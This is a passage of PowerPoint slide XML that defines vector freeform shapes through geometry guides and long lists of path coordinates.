                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="383" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="426" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="236" y="346"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="263" y="383"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="247" y="147"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="247" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="195" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="167"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="167"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="183"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="267"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="283"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="289" y="188"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="289" y="188"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="147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0" name="Freeform 62"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6838950" y="5391150"/>
                <a:ext cx="263525" cy="255588"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 457 w 731"/>
                  <a:gd name="T1" fmla="*/ 556 h 709"/>
                  <a:gd name="T2" fmla="*/ 493 w 731"/>
                  <a:gd name="T3" fmla="*/ 566 h 709"/>
                  <a:gd name="T4" fmla="*/ 530 w 731"/>
                  <a:gd name="T5" fmla="*/ 561 h 709"/>
                  <a:gd name="T6" fmla="*/ 572 w 731"/>
                  <a:gd name="T7" fmla="*/ 530 h 709"/>
                  <a:gd name="T8" fmla="*/ 593 w 731"/>
                  <a:gd name="T9" fmla="*/ 467 h 709"/>
                  <a:gd name="T10" fmla="*/ 588 w 731"/>
                  <a:gd name="T11" fmla="*/ 435 h 709"/>
                  <a:gd name="T12" fmla="*/ 562 w 731"/>
                  <a:gd name="T13" fmla="*/ 398 h 709"/>
                  <a:gd name="T14" fmla="*/ 525 w 731"/>
                  <a:gd name="T15" fmla="*/ 378 h 709"/>
                  <a:gd name="T16" fmla="*/ 488 w 731"/>
                  <a:gd name="T17" fmla="*/ 372 h 709"/>
                  <a:gd name="T18" fmla="*/ 441 w 731"/>
                  <a:gd name="T19" fmla="*/ 383 h 709"/>
                  <a:gd name="T20" fmla="*/ 336 w 731"/>
                  <a:gd name="T21" fmla="*/ 435 h 709"/>
                  <a:gd name="T22" fmla="*/ 257 w 731"/>
                  <a:gd name="T23" fmla="*/ 461 h 709"/>
                  <a:gd name="T24" fmla="*/ 184 w 731"/>
                  <a:gd name="T25" fmla="*/ 467 h 709"/>
                  <a:gd name="T26" fmla="*/ 116 w 731"/>
                  <a:gd name="T27" fmla="*/ 435 h 709"/>
                  <a:gd name="T28" fmla="*/ 47 w 731"/>
                  <a:gd name="T29" fmla="*/ 372 h 709"/>
                  <a:gd name="T30" fmla="*/ 0 w 731"/>
                  <a:gd name="T31" fmla="*/ 251 h 709"/>
                  <a:gd name="T32" fmla="*/ 21 w 731"/>
                  <a:gd name="T33" fmla="*/ 173 h 709"/>
                  <a:gd name="T34" fmla="*/ 73 w 731"/>
                  <a:gd name="T35" fmla="*/ 89 h 709"/>
                  <a:gd name="T36" fmla="*/ 147 w 731"/>
                  <a:gd name="T37" fmla="*/ 31 h 709"/>
                  <a:gd name="T38" fmla="*/ 220 w 731"/>
                  <a:gd name="T39" fmla="*/ 0 h 709"/>
                  <a:gd name="T40" fmla="*/ 299 w 731"/>
                  <a:gd name="T41" fmla="*/ 5 h 709"/>
                  <a:gd name="T42" fmla="*/ 393 w 731"/>
                  <a:gd name="T43" fmla="*/ 68 h 709"/>
                  <a:gd name="T44" fmla="*/ 257 w 731"/>
                  <a:gd name="T45" fmla="*/ 147 h 709"/>
                  <a:gd name="T46" fmla="*/ 226 w 731"/>
                  <a:gd name="T47" fmla="*/ 136 h 709"/>
                  <a:gd name="T48" fmla="*/ 173 w 731"/>
                  <a:gd name="T49" fmla="*/ 147 h 709"/>
                  <a:gd name="T50" fmla="*/ 147 w 731"/>
                  <a:gd name="T51" fmla="*/ 178 h 709"/>
                  <a:gd name="T52" fmla="*/ 136 w 731"/>
                  <a:gd name="T53" fmla="*/ 215 h 709"/>
                  <a:gd name="T54" fmla="*/ 136 w 731"/>
                  <a:gd name="T55" fmla="*/ 246 h 709"/>
                  <a:gd name="T56" fmla="*/ 168 w 731"/>
                  <a:gd name="T57" fmla="*/ 283 h 709"/>
                  <a:gd name="T58" fmla="*/ 220 w 731"/>
                  <a:gd name="T59" fmla="*/ 309 h 709"/>
                  <a:gd name="T60" fmla="*/ 252 w 731"/>
                  <a:gd name="T61" fmla="*/ 309 h 709"/>
                  <a:gd name="T62" fmla="*/ 410 w 731"/>
                  <a:gd name="T63" fmla="*/ 241 h 709"/>
                  <a:gd name="T64" fmla="*/ 483 w 731"/>
                  <a:gd name="T65" fmla="*/ 215 h 709"/>
                  <a:gd name="T66" fmla="*/ 546 w 731"/>
                  <a:gd name="T67" fmla="*/ 215 h 709"/>
                  <a:gd name="T68" fmla="*/ 598 w 731"/>
                  <a:gd name="T69" fmla="*/ 231 h 709"/>
                  <a:gd name="T70" fmla="*/ 651 w 731"/>
                  <a:gd name="T71" fmla="*/ 267 h 709"/>
                  <a:gd name="T72" fmla="*/ 724 w 731"/>
                  <a:gd name="T73" fmla="*/ 388 h 709"/>
                  <a:gd name="T74" fmla="*/ 719 w 731"/>
                  <a:gd name="T75" fmla="*/ 477 h 709"/>
                  <a:gd name="T76" fmla="*/ 640 w 731"/>
                  <a:gd name="T77" fmla="*/ 608 h 709"/>
                  <a:gd name="T78" fmla="*/ 557 w 731"/>
                  <a:gd name="T79" fmla="*/ 682 h 709"/>
                  <a:gd name="T80" fmla="*/ 478 w 731"/>
                  <a:gd name="T81" fmla="*/ 708 h 709"/>
                  <a:gd name="T82" fmla="*/ 363 w 731"/>
                  <a:gd name="T83" fmla="*/ 672 h 709"/>
                  <a:gd name="T84" fmla="*/ 404 w 731"/>
                  <a:gd name="T85" fmla="*/ 509 h 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731" h="709">
                    <a:moveTo>
                      <a:pt x="420" y="525"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="420" y="525"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="457" y="556"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="457" y="556"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="478" y="561"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="493" y="566"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="493" y="566"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="514" y="566"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="530" y="561"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="530" y="561"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="551" y="545"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="572" y="530"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="572" y="530"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="588" y="498"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="593" y="467"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="593" y="467"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="593" y="451"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="588" y="435"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="577" y="414"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="562" y="398"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="562" y="398"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="546" y="388"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="525" y="378"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="525" y="378"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="510" y="372"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="488" y="372"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="488" y="372"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="467" y="378"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="441" y="383"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="441" y="383"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="414"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="414"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="336" y="435"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="456"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="456"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="461"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="220" y="467"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="220" y="467"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="467"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="451"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="451"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="435"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="409"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="409"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="372"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="330"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="294"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="251"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="251"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="220" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="220" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="299" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="299" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="336" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="393" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="242" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="205" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="246"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="257"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="257"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="283"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="283"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="194" y="299"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="220" y="309"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="220" y="309"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="236" y="309"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="252" y="309"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="294"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="410" y="241"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="410" y="241"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446" y="225"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="483" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="483" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="514" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="546" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="546" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="572" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="598" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="598" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="625" y="246"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="651" y="267"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="651" y="267"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="687" y="309"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="714" y="346"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="724" y="388"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="730" y="435"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="730" y="435"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="719" y="477"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="704" y="519"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="677" y="566"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="640" y="608"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="640" y="608"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="598" y="651"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="557" y="682"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="520" y="698"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="478" y="708"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="478" y="708"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="441" y="703"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="404" y="692"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="363" y="672"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="326" y="640"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="304" y="619"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="404" y="509"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="420" y="525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1" name="Freeform 63"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7016750" y="5294313"/>
                <a:ext cx="204788" cy="195262"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 289 w 569"/>
                  <a:gd name="T1" fmla="*/ 367 h 541"/>
                  <a:gd name="T2" fmla="*/ 331 w 569"/>
                  <a:gd name="T3" fmla="*/ 393 h 541"/>
                  <a:gd name="T4" fmla="*/ 373 w 569"/>
                  <a:gd name="T5" fmla="*/ 409 h 541"/>
                  <a:gd name="T6" fmla="*/ 410 w 569"/>
                  <a:gd name="T7" fmla="*/ 409 h 541"/>
                  <a:gd name="T8" fmla="*/ 426 w 569"/>
                  <a:gd name="T9" fmla="*/ 404 h 541"/>
                  <a:gd name="T10" fmla="*/ 436 w 569"/>
                  <a:gd name="T11" fmla="*/ 388 h 541"/>
                  <a:gd name="T12" fmla="*/ 452 w 569"/>
                  <a:gd name="T13" fmla="*/ 362 h 541"/>
                  <a:gd name="T14" fmla="*/ 447 w 569"/>
                  <a:gd name="T15" fmla="*/ 331 h 541"/>
                  <a:gd name="T16" fmla="*/ 431 w 569"/>
                  <a:gd name="T17" fmla="*/ 299 h 541"/>
                  <a:gd name="T18" fmla="*/ 478 w 569"/>
                  <a:gd name="T19" fmla="*/ 162 h 541"/>
                  <a:gd name="T20" fmla="*/ 515 w 569"/>
                  <a:gd name="T21" fmla="*/ 194 h 541"/>
                  <a:gd name="T22" fmla="*/ 557 w 569"/>
                  <a:gd name="T23" fmla="*/ 262 h 541"/>
                  <a:gd name="T24" fmla="*/ 568 w 569"/>
                  <a:gd name="T25" fmla="*/ 294 h 541"/>
                  <a:gd name="T26" fmla="*/ 557 w 569"/>
                  <a:gd name="T27" fmla="*/ 367 h 541"/>
                  <a:gd name="T28" fmla="*/ 510 w 569"/>
                  <a:gd name="T29" fmla="*/ 446 h 541"/>
                  <a:gd name="T30" fmla="*/ 488 w 569"/>
                  <a:gd name="T31" fmla="*/ 472 h 541"/>
                  <a:gd name="T32" fmla="*/ 441 w 569"/>
                  <a:gd name="T33" fmla="*/ 514 h 541"/>
                  <a:gd name="T34" fmla="*/ 415 w 569"/>
                  <a:gd name="T35" fmla="*/ 525 h 541"/>
                  <a:gd name="T36" fmla="*/ 368 w 569"/>
                  <a:gd name="T37" fmla="*/ 535 h 541"/>
                  <a:gd name="T38" fmla="*/ 321 w 569"/>
                  <a:gd name="T39" fmla="*/ 535 h 541"/>
                  <a:gd name="T40" fmla="*/ 279 w 569"/>
                  <a:gd name="T41" fmla="*/ 519 h 541"/>
                  <a:gd name="T42" fmla="*/ 231 w 569"/>
                  <a:gd name="T43" fmla="*/ 499 h 541"/>
                  <a:gd name="T44" fmla="*/ 147 w 569"/>
                  <a:gd name="T45" fmla="*/ 436 h 541"/>
                  <a:gd name="T46" fmla="*/ 64 w 569"/>
                  <a:gd name="T47" fmla="*/ 362 h 541"/>
                  <a:gd name="T48" fmla="*/ 32 w 569"/>
                  <a:gd name="T49" fmla="*/ 320 h 541"/>
                  <a:gd name="T50" fmla="*/ 11 w 569"/>
                  <a:gd name="T51" fmla="*/ 278 h 541"/>
                  <a:gd name="T52" fmla="*/ 0 w 569"/>
                  <a:gd name="T53" fmla="*/ 236 h 541"/>
                  <a:gd name="T54" fmla="*/ 0 w 569"/>
                  <a:gd name="T55" fmla="*/ 189 h 541"/>
                  <a:gd name="T56" fmla="*/ 6 w 569"/>
                  <a:gd name="T57" fmla="*/ 162 h 541"/>
                  <a:gd name="T58" fmla="*/ 37 w 569"/>
                  <a:gd name="T59" fmla="*/ 110 h 541"/>
                  <a:gd name="T60" fmla="*/ 53 w 569"/>
                  <a:gd name="T61" fmla="*/ 78 h 541"/>
                  <a:gd name="T62" fmla="*/ 116 w 569"/>
                  <a:gd name="T63" fmla="*/ 26 h 541"/>
                  <a:gd name="T64" fmla="*/ 132 w 569"/>
                  <a:gd name="T65" fmla="*/ 10 h 541"/>
                  <a:gd name="T66" fmla="*/ 216 w 569"/>
                  <a:gd name="T67" fmla="*/ 0 h 541"/>
                  <a:gd name="T68" fmla="*/ 263 w 569"/>
                  <a:gd name="T69" fmla="*/ 10 h 541"/>
                  <a:gd name="T70" fmla="*/ 305 w 569"/>
                  <a:gd name="T71" fmla="*/ 31 h 541"/>
                  <a:gd name="T72" fmla="*/ 405 w 569"/>
                  <a:gd name="T73" fmla="*/ 94 h 541"/>
                  <a:gd name="T74" fmla="*/ 258 w 569"/>
                  <a:gd name="T75" fmla="*/ 336 h 541"/>
                  <a:gd name="T76" fmla="*/ 231 w 569"/>
                  <a:gd name="T77" fmla="*/ 136 h 541"/>
                  <a:gd name="T78" fmla="*/ 211 w 569"/>
                  <a:gd name="T79" fmla="*/ 126 h 541"/>
                  <a:gd name="T80" fmla="*/ 190 w 569"/>
                  <a:gd name="T81" fmla="*/ 121 h 541"/>
                  <a:gd name="T82" fmla="*/ 158 w 569"/>
                  <a:gd name="T83" fmla="*/ 121 h 541"/>
                  <a:gd name="T84" fmla="*/ 142 w 569"/>
                  <a:gd name="T85" fmla="*/ 131 h 541"/>
                  <a:gd name="T86" fmla="*/ 127 w 569"/>
                  <a:gd name="T87" fmla="*/ 147 h 541"/>
                  <a:gd name="T88" fmla="*/ 116 w 569"/>
                  <a:gd name="T89" fmla="*/ 178 h 541"/>
                  <a:gd name="T90" fmla="*/ 116 w 569"/>
                  <a:gd name="T91" fmla="*/ 194 h 541"/>
                  <a:gd name="T92" fmla="*/ 121 w 569"/>
                  <a:gd name="T93" fmla="*/ 215 h 541"/>
                  <a:gd name="T94" fmla="*/ 142 w 569"/>
                  <a:gd name="T95" fmla="*/ 246 h 541"/>
                  <a:gd name="T96" fmla="*/ 190 w 569"/>
                  <a:gd name="T97" fmla="*/ 283 h 541"/>
                  <a:gd name="T98" fmla="*/ 279 w 569"/>
                  <a:gd name="T99" fmla="*/ 168 h 5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69" h="541">
                    <a:moveTo>
                      <a:pt x="289" y="367"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="289" y="367"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="393"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="393"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="373" y="409"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="373" y="409"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="389" y="409"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="410" y="409"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="410" y="409"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="426" y="404"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="436" y="388"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="436" y="388"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="447" y="378"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="452" y="362"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="452" y="346"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="447" y="331"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="447" y="331"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="431" y="299"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="400" y="268"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="478" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="478" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="515" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="536" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="557" y="262"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="568" y="294"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="568" y="294"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="568" y="331"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="557" y="367"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="541" y="409"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="510" y="446"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="510" y="446"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="488" y="472"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="462" y="499"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="441" y="514"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="415" y="525"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="415" y="525"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="394" y="535"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="368" y="535"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="347" y="540"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="321" y="535"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="321" y="535"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="279" y="519"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="499"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="499"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="436"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="436"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="362"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="362"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="320"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="278"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="278"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="257"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="216" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="216" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="263" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="305" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
